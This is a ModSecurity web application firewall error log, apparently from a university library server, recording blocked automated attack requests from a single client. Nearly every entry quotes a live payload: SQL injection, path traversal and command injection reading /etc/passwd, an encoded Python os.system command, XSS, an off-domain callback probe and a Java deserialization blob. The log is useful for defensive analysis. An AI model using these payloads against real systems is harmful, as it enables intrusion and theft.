[Tue Aug 29 11:35:14.368215 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAUKhBkAAABC"]
[Tue Aug 29 11:35:15.967524 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11g8Co-f0AAAVr@RcAAAAZ"]
[Tue Aug 29 11:35:16.356316 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATUxTUAAAAW"]
[Tue Aug 29 11:35:16.360078 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUZcHIAAABO"]
[Tue Aug 29 11:35:16.383319 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAATOA-YAAAAH"]
[Tue Aug 29 11:35:18.446675 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAASHh@4AAAAD"]
[Tue Aug 29 11:35:18.503886 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVoCAgAAAAY"]
[Tue Aug 29 11:35:19.308298 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAShCb0AAAAi"]
[Tue Aug 29 11:35:20.401301 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11iMCo-f0AAATlLHkAAAAq"]
[Tue Aug 29 11:35:21.317298 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAUUZ@EAAABK"]
[Tue Aug 29 11:35:22.337065 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAPLwMQAAAAX"]
[Tue Aug 29 11:35:23.369788 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAASHh-cAAAAD"]
[Tue Aug 29 11:35:24.303376 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAVr@SIAAAAZ"]
[Tue Aug 29 11:35:24.332704 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAATlLIEAAAAq"]
[Tue Aug 29 11:35:25.313018 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAVsUccAAAAb"]
[Tue Aug 29 11:35:26.369000 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAATOBAUAAAAH"]
[Tue Aug 29 11:35:27.315786 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASEJakAAAAE"]
[Tue Aug 29 11:35:27.319637 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUR88MAAABI"]
[Tue Aug 29 11:35:28.297303 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAVmuMIAAAAT"]
[Tue Aug 29 11:35:29.301026 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAASPDRAAAAAS"]
[Tue Aug 29 11:35:29.333778 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAUUZ@4AAABK"]
[Tue Aug 29 11:35:30.300000 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAATge@gAAAAl"]
[Tue Aug 29 11:35:31.414826 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11k8Co-f0AAATge@sAAAAl"]
[Tue Aug 29 11:35:32.313185 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAPY1tAAAAAh"]
[Tue Aug 29 11:35:32.336234 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAVJXnUAAAAA"]
[Tue Aug 29 11:35:32.337272 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAV6LBoAAAAI"]
[Tue Aug 29 11:35:33.365793 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAVr@TIAAAAZ"]
[Tue Aug 29 11:35:34.292664 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAPY1tUAAAAh"]
[Tue Aug 29 11:35:34.321117 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAT9PSQAAAA1"]
